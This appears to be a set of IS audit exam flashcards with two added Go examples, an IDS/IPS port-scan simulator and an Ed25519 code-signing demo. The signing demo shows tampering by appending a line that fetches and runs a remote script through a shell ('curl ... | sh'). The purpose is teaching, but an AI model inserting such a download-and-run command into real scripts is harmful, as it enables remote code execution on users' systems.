Review Flashcards

1
Q

The success of control self-assessment depends highly on:

A

line managers assuming a portion of the responsibility for control monitoring.

2
Q

The primary objective of a control self-assessment (CSA) program is to leverage the internal audit function by

A

shifting some of the control monitoring responsibilities to the functional area line managers. The success of a CSA program depends on the degree to which line managers assume responsibility for controls. This enables line managers to detect and respond to control errors promptly.

3
Q

Which of the following is MOST important for the auditor to ensure continued alignment with the enterprise’s security requirements?

A

The vendor agrees in the contract to provide annual external audit reports. Including a clause that obliges the vendor to provide future external audit reports is the only way to ensure that any potential risk is mitigated today and in the future; without the audit clause the vendor can choose to forego future audits.

4
Q

Without a(n) ____________ clause in the contract, an agreement to implement controls does not provide assurance that controls will continue to be implemented in alignment with the enterprise's security requirements.

A

audit

5
Q

What is the purpose of using data flow diagrams?

A

graphically summarize data paths and storage.

6
Q

Data flow diagrams are used as aids to graph or chart data flow and storage.

A

They trace data from their origination to destination, highlighting the paths and storage of data.

7
Q

The MOST serious challenge in the operation of an intrusion detection system is

A

filtering false positive alerts.

8
Q

Because of the configuration and the way intrusion detection system (IDS) technology operates, the main problem in operating IDSs is the recognition (detection) of events

A

that are not really security incidents—false positives, the equivalent of a false alarm. An IS auditor needs to be aware of this and should check for implementation of related controls (such as IDS tuning) and incident handling procedures (such as the screening process) to know if an event is a security incident or a false positive.

9
Q

Blocking suspicious connections is a characteristic of intrusion prevention systems, which are a different type of network security system than

A

an IDS (intrusion detection system), which detects and alerts but does not block.

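Added example (not part of the original flashcards): a small Go engine that reads constructed firewall-style log lines, applies one port-scan rule, and shows the false positive from an authorized scanner that cards 7 and 8 describe, the tuning (an allowlist) that removes it, and the difference from card 9 between detect mode (IDS: alert only) and prevent mode (IPS: alert and block the source). The log format, the addresses and the threshold of four distinct ports are assumptions made for the example.

```go
package main

import (
	"fmt"
	"strings"
)

// Mode distinguishes an IDS, which only alerts, from an IPS, which also blocks.
type Mode int

const (
	Detect  Mode = iota // IDS behaviour
	Prevent             // IPS behaviour
)

// Event is one connection attempt parsed from a log line.
type Event struct {
	Src, Dst, Port string
}

// parseLine reads a constructed firewall-style line such as
// "SRC=203.0.113.7 DST=10.0.0.20 DPT=22 SYN"; unrelated lines are skipped.
func parseLine(line string) (Event, bool) {
	var e Event
	for _, field := range strings.Fields(line) {
		key, val, found := strings.Cut(field, "=")
		if !found {
			continue
		}
		switch key {
		case "SRC":
			e.Src = val
		case "DST":
			e.Dst = val
		case "DPT":
			e.Port = val
		}
	}
	return e, e.Src != "" && e.Port != ""
}

// Engine holds the outcome of one run: alerts raised, sources blocked, events dropped.
type Engine struct {
	Mode      Mode
	Threshold int             // distinct destination ports from one source that count as a scan
	Allow     map[string]bool // tuning: sources whose scanning is authorized
	Alerts    []string
	Blocked   map[string]bool
	Dropped   int
}

// Run applies a single port-scan rule to the log, in detect or prevent mode.
func Run(mode Mode, allow map[string]bool, lines []string) Engine {
	en := Engine{Mode: mode, Threshold: 4, Allow: allow, Blocked: map[string]bool{}}
	ports := map[string]map[string]bool{}
	alerted := map[string]bool{}
	for _, line := range lines {
		e, ok := parseLine(line)
		if !ok {
			continue
		}
		if en.Blocked[e.Src] { // IPS: traffic from a blocked source never reaches the host
			en.Dropped++
			continue
		}
		if en.Allow[e.Src] { // tuned out: the authorized scanner is no longer a false positive
			continue
		}
		if ports[e.Src] == nil {
			ports[e.Src] = map[string]bool{}
		}
		ports[e.Src][e.Port] = true
		if len(ports[e.Src]) >= en.Threshold && !alerted[e.Src] {
			alerted[e.Src] = true
			en.Alerts = append(en.Alerts, fmt.Sprintf("possible port scan from %s against %s (%d ports)", e.Src, e.Dst, len(ports[e.Src])))
			if en.Mode == Prevent {
				en.Blocked[e.Src] = true
			}
		}
	}
	return en
}

// sampleLog is constructed for this example: an attacker (203.0.113.7), an authorized
// vulnerability scanner (10.0.0.9) and an ordinary user (10.0.0.15), interleaved.
var sampleLog = []string{
	"SRC=203.0.113.7 DST=10.0.0.20 DPT=22 SYN",
	"SRC=10.0.0.15 DST=10.0.0.20 DPT=443 SYN",
	"SRC=10.0.0.9 DST=10.0.0.20 DPT=22 SYN",
	"SRC=203.0.113.7 DST=10.0.0.20 DPT=23 SYN",
	"SRC=10.0.0.9 DST=10.0.0.20 DPT=80 SYN",
	"SRC=203.0.113.7 DST=10.0.0.20 DPT=80 SYN",
	"SRC=10.0.0.15 DST=10.0.0.20 DPT=443 SYN",
	"SRC=10.0.0.9 DST=10.0.0.20 DPT=443 SYN",
	"SRC=203.0.113.7 DST=10.0.0.20 DPT=443 SYN",  // attacker's 4th distinct port: alert
	"SRC=10.0.0.9 DST=10.0.0.20 DPT=3389 SYN",    // scanner's 4th distinct port: alert unless tuned
	"SRC=203.0.113.7 DST=10.0.0.20 DPT=3389 SYN", // dropped once the IPS has blocked the source
	"kernel: unrelated message",
}

func main() {
	untuned := Run(Detect, nil, sampleLog)
	fmt.Println("IDS, untuned:", untuned.Alerts) // two alerts; the scanner is a false positive
	tuned := Run(Prevent, map[string]bool{"10.0.0.9": true}, sampleLog)
	fmt.Println("IPS, tuned:", tuned.Alerts, "blocked:", tuned.Blocked, "dropped:", tuned.Dropped)
}
```

The untuned detect run raises two alerts, one of them the authorized scanner: the false positive an IS auditor would expect the screening process to weed out. Allowlisting the scanner is the tuning; switching to prevent mode is what turns the same rule into an IPS, which is why a mistuned rule is far more damaging there than in an IDS.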
10
Q

A company’s development team does not follow generally accepted system development life cycle practices. Which of the following is MOST likely to cause problems for software development projects?

A

Project responsibilities are not formally defined at the beginning of a project.

11
Q

Errors or lack of attention in the initial phases of a project may cause

A

costly errors and inefficiencies in later phases. Proper planning is required at the beginning of a project.

12
Q

Prototypes are verified

A

by users.

13
Q

User acceptance testing is seldom completely successful. If errors are not critical,

A

they may be corrected after implementation without seriously affecting usage.

14
Q

Lack of adequate program documentation, while a concern, is

A

not as big a risk as the lack of assigned responsibilities during the initial stages of the project.

15
Q

What is the MOST important skill that an IS auditor should develop to understand the constraints of conducting an audit?

A

Project management

16
Q

Audits often involve resource management, deliverables, scheduling and deadlines that are similar to

A

project management good practices.

17
Q

Which of the following BEST helps prioritize the recovery of IT assets when planning for a disaster?

A

Business impact analysis

18
Q

Incorporating the business impact analysis (BIA) into the IT disaster recovery planning process is critical to ensure

A

that IT assets are prioritized to align with the business.

19
Q

An incident response plan is an organized approach to addressing and managing

A

a security breach or attack.

20
Q

An incident response plan

A

defines what constitutes an incident and the process to follow when an incident occurs.

21
Q

An incident response plan

A

does NOT prioritize recovery during a disaster.

22
Q

Identifying threats and analyzing risk to the business is an important part of disaster planning, but it does NOT

A

determine the priority of recovery.

23
Q

The recovery time objective (RTO) is

A

the amount of time allowed for the recovery of a business function or resource after a disaster occurs.

24
Q

The recovery time objective (RTO) is

A

included as part of the BIA and used to represent the prioritization of recovery.

25
Q

An IS auditor reviewing an outsourcing contract of IT facilities expects it to define the:

A

ownership of intellectual property.

26
Q

An outsourcing contract must specify

A

who owns the intellectual property (i.e., information being processed and application programs). Ownership of intellectual property is a significant cost and is a key aspect to be defined in an outsourcing contract.

27
Q

Which stakeholder is PRIMARILY responsible for reviewing and signing off on the accuracy and completeness of the data before going live?

A

Data owner

28
Q

An IS auditor

A

should ensure that there is a review and sign-off by the data owner during the data conversion stage of the project.

29
Q

A database administrator’s primary responsibility is to

A

maintain the integrity of the database and make the database available to users. A database administrator is not responsible for reviewing migrated data.

30
Q

A project manager provides

A

day-to-day management and leadership of the project but is not responsible for the accuracy and integrity of the data.

31
Q

Senior management should

A

establish the acceptable risk level, because they have the ultimate or final responsibility for the effective and efficient operation of the organization as senior managers of the business process. The person may also hold a quality assurance (QA), chief information officer (CIO) or chief security officer (CSO) role, but the responsibility rests with the business manager.

32
Q

Quality assurance management is

A

concerned with the reliability and consistency of processes. The QA team is not responsible for determining an acceptable risk level.

33
Q

Establishing the level of acceptable risk is the responsibility of:

A

senior business management.

34
Q

The CIO is the

A

most senior official of the enterprise who is accountable for IT advocacy; aligning IT and business strategies; and planning, resourcing and managing the delivery of IT services, information and the deployment of associated human resources. The CIO is rarely the person that determines acceptable risk levels because this could be a conflict of interest unless the CIO is the senior business process owner.

35
Q

The chief security officer is

A

responsible for enforcing the decisions of the senior management team unless the CIO is the business process manager.

36
Q

An IS auditor reviewing the process of log monitoring wants to evaluate the organization’s manual review process. Which of the following audit techniques would the auditor MOST likely employ to fulfill this purpose?

A

Walk-through

37
Q

Walk-through procedures include

A

a combination of inquiry, observation, inspection of relevant documentation and reperformance of controls. A walk-through of the manual log review process follows the manual log review process from start to finish to gain a thorough understanding of the overall process and identify potential control weaknesses.

38
Q

Inspection

A

is just one component of a walk-through and by itself does not supply enough information to provide a full understanding of the overall process and identify potential control weaknesses.

39
Q

Inquiry

A

provides only general information on how the control is executed. It does not necessarily enable the IS auditor to determine whether the control performer has an in-depth understanding of the control.

40
Q

Reperformance of the control is carried out by

A

the IS auditor and does not provide assurance of the competency of the auditee.

41
Q

An IS auditor reviewing a cloud computing environment that is managed by a third party should be MOST concerned when

A

the service level agreement does not address the responsibility of the vendor in the case of a security breach.

42
Q

The ultimate purpose of IT governance is to:

A

encourage optimal use of IT.

43
Q

IT governance is intended to

A

specify the combination of decision rights and accountability that is best for the enterprise. It is different for every enterprise.

44
Q

Parallel operation is designed to

A

provide assurance that a new system meets its functional requirements. This is the safest form of system conversion testing because, if the new system fails, the old system is still available for production use. In addition, this form of testing allows the application developers and administrators to simultaneously run operational tasks (e.g., batch jobs and backups) on both systems, to ensure that the new system is reliable before unplugging the old system.

45
Q

Parallel operation provides a high level of assurance that the new system functions properly compared to the old system. Parallel operation is generally expensive and does not provide a cost savings over most other testing approaches. In many cases, parallel operation is the most

A

expensive form of system testing due to the need for dual data entry, dual sets of hardware, dual maintenance and dual backups—it is twice the amount of work as running a production system and, therefore, costs more time and money.

46
Q

The IS auditor is reviewing a recently completed conversion to a new enterprise resource planning system. In the final stage of the conversion process, the organization ran the old and new systems in parallel for 30 days before allowing the new system to run on its own. What is the MOST significant advantage to the organization by using this strategy?

A

Assurance that the new system meets functional requirements

47
Q

Parallel operation is designed to test the application’s effectiveness and integrity of application data, not

A

hardware compatibility.

48
Q

Which of the following is a responsibility of the chief information security officer?

A

Periodically reviewing and evaluating the security policy

49
Q

The role of the chief information security officer is to ensure that the corporate

A

security policy and controls are adequate to prevent unauthorized access to the enterprise assets, including data, programs and equipment.

50
Q

User application and other software testing and evaluation normally are the responsibility of the

A

staff assigned to development and maintenance.

51
Q

Granting and revoking user access to IT resources

A

is usually a function of system, network or database administrators.

52
Q

Approval of access to data and applications is

A

the duty of the data or application owner.

53
Q

Which type of penetration test simulates a real attack and is used to test incident handling and response capability of the target?

A

Double-blind testing

54
Q

Double-blind testing is also known as

A

zero-knowledge testing. This refers to a test where the penetration tester is not given any information and the target organization is not given any warning—both parties are “blind” to the test. This is the best scenario for testing response capability because the target will react as if the attack were real.

55
Q

Blind testing is

A

also known as black-box testing.

56
Q

Black-box testing

A

refers to a test where the penetration tester is not given any information and is forced to rely on publicly available information. This test simulates a real attack, except that the target organization is aware of the test being conducted.

57
Q

Targeted testing is

A

also known as white-box testing

58
Q

White-box testing

A

refers to a test where the penetration tester is provided with information and the target organization is also aware of the testing activities. In some cases, the tester is also provided with a limited-privilege account to be used as a starting point.

59
Q

External testing

A

refers to a test where an external penetration tester launches attacks on the target’s network perimeter from outside the target network (typically from the Internet).

60
Q

A company has decided to implement an electronic signature scheme based on a public key infrastructure. The user’s private key will be stored on the computer’s hard drive and protected by a password. The MOST significant risk of this approach is:

A

use of the user’s electronic signature by another person if the password is compromised.

61
Q

Creating a digital signature with another user’s private key would indicate that the message

A

came from a different person, so the true user's credentials would not be forged: the signature would fail verification against the true user's public key.

62
Q

Impersonation of a user by substitution of the user’s public key with another person’s public key

A

would require the modification of the certificate issued by the certificate authority. This is very difficult and least likely.

63
Q

Forgery by substitution of another person's private key on the computer

A

would not work because the digital signature would be validated with the original user’s public key.

64
Q

Regarding a PIN, what is the MOST important rule to be included in a security policy?

A

Users should never write down their PIN

If a user writes their PIN on a slip of paper, an individual with the token, the slip of paper and the computer could access the corporate network. A token plus a PIN is a two-factor authentication method (something you have and something you know); writing the PIN down collapses it to a single factor.

65
Q

The purpose of code signing is to provide assurance that:

A

the software has not been subsequently modified.

66
Q

Code signing ensures that the executable code came from a reputable source and

A

has not been modified after being signed.

67
Q

Code signing will provide assurance of the source but will not ensure that the source is

A

trusted. The code signing will, however, ensure that the code has not been modified.
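Added example (not from the original flashcards) that walks through cards 60 to 63 and 65 to 67 in Go with the standard library's Ed25519. The certificate format is a deliberate simplification assumed for the example (the CA signs a subject name concatenated with the subject's public key; real deployments use X.509), as are the names, the password and the artifacts. The verifier checks the certificate under the CA key before checking the message signature, which is what makes each scenario behave as the cards state: a compromised password yields a valid signature (card 60), a planted private key fails against the certified public key (63), a swapped public key breaks the CA's signature on the certificate (62), and code signing detects modification after signing but says nothing about whether the signer should be trusted (65 to 67).

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"fmt"
)

// Certificate is a simplified stand-in for an X.509 certificate (assumption for
// this example): the CA signs the subject name concatenated with the public key.
type Certificate struct {
	Subject string
	PubKey  ed25519.PublicKey
	CASig   []byte
}

// tbs is the "to be signed" byte string the CA commits to.
func tbs(subject string, pub ed25519.PublicKey) []byte {
	return append([]byte(subject+"|"), pub...)
}

// IssueCert binds a public key to a subject under the CA's signature.
func IssueCert(caPriv ed25519.PrivateKey, subject string, pub ed25519.PublicKey) Certificate {
	return Certificate{Subject: subject, PubKey: pub, CASig: ed25519.Sign(caPriv, tbs(subject, pub))}
}

// Verify accepts a signature only if the certificate is intact under the CA's key
// and the signature matches the certified public key.
func Verify(caPub ed25519.PublicKey, cert Certificate, msg, sig []byte) bool {
	if !ed25519.Verify(caPub, tbs(cert.Subject, cert.PubKey), cert.CASig) {
		return false // public key swapped without the CA re-issuing the certificate (card 62)
	}
	return ed25519.Verify(cert.PubKey, msg, sig)
}

// KeyOnDisk models the card-60 setup: a private key on the hard drive unlocked by a password.
type KeyOnDisk struct {
	password string
	key      ed25519.PrivateKey
}

// Unlock returns the key for the right password; nothing ties the key to the person typing it.
func (k KeyOnDisk) Unlock(password string) (ed25519.PrivateKey, bool) {
	if password != k.password {
		return nil, false
	}
	return k.key, true
}

// Results records whether the verifier accepted each scenario's signature.
type Results struct {
	Legit, StolenPassword, SwappedPrivateKey, SwappedPublicKey bool
	IntactCode, ModifiedCode, UntrustedPublisher           bool
}

func RunScenarios() Results {
	caPub, caPriv, _ := ed25519.GenerateKey(rand.Reader)
	alicePub, alicePriv, _ := ed25519.GenerateKey(rand.Reader)
	malloryPub, malloryPriv, _ := ed25519.GenerateKey(rand.Reader)
	aliceCert := IssueCert(caPriv, "alice", alicePub)
	disk := KeyOnDisk{password: "hunter2", key: alicePriv} // constructed example password
	msg := []byte("approve payment of 1000 to account 42")  // constructed message
	var r Results

	// Alice unlocks her own key and signs.
	key, _ := disk.Unlock("hunter2")
	r.Legit = Verify(caPub, aliceCert, msg, ed25519.Sign(key, msg))

	// Card 60: Mallory learned the password. She signs with Alice's real key, so the
	// signature is indistinguishable from Alice's own and verifies.
	stolen, ok := disk.Unlock("hunter2")
	r.StolenPassword = ok && Verify(caPub, aliceCert, msg, ed25519.Sign(stolen, msg))

	// Card 63: Mallory plants her own private key on Alice's computer. Whatever it
	// signs fails against Alice's certified public key.
	r.SwappedPrivateKey = Verify(caPub, aliceCert, msg, ed25519.Sign(malloryPriv, msg))

	// Card 62: Mallory swaps the public key inside Alice's certificate. The CA's
	// signature over the certificate no longer matches, so verification stops there.
	forged := aliceCert
	forged.PubKey = malloryPub
	r.SwappedPublicKey = Verify(caPub, forged, msg, ed25519.Sign(malloryPriv, msg))

	// Cards 65 and 66: code signing detects any modification made after signing.
	artifact := []byte("#!/bin/sh\necho installing\n") // constructed artifact
	codeSig := ed25519.Sign(alicePriv, artifact)
	r.IntactCode = Verify(caPub, aliceCert, artifact, codeSig)
	modified := append(append([]byte{}, artifact...), "curl http://203.0.113.7/x | sh\n"...)
	r.ModifiedCode = Verify(caPub, aliceCert, modified, codeSig)

	// Card 67: a valid signature under a CA-issued certificate identifies the signer;
	// it does not make the signer trustworthy. Mallory's own certificate verifies fine.
	malloryCert := IssueCert(caPriv, "mallory", malloryPub)
	r.UntrustedPublisher = Verify(caPub, malloryCert, modified, ed25519.Sign(malloryPriv, modified))
	return r
}

func main() {
	fmt.Printf("%+v\n", RunScenarios())
}
```

The two accepted attack cases are the instructive ones: the compromised password is the card-60 risk because the verifier has no way to tell Alice from whoever typed her password, and the untrusted publisher is the card-67 caveat because the trust decision about the signer has to be made outside the signature check (a publisher allowlist, a trusted-CA policy, or review of what the certificate names).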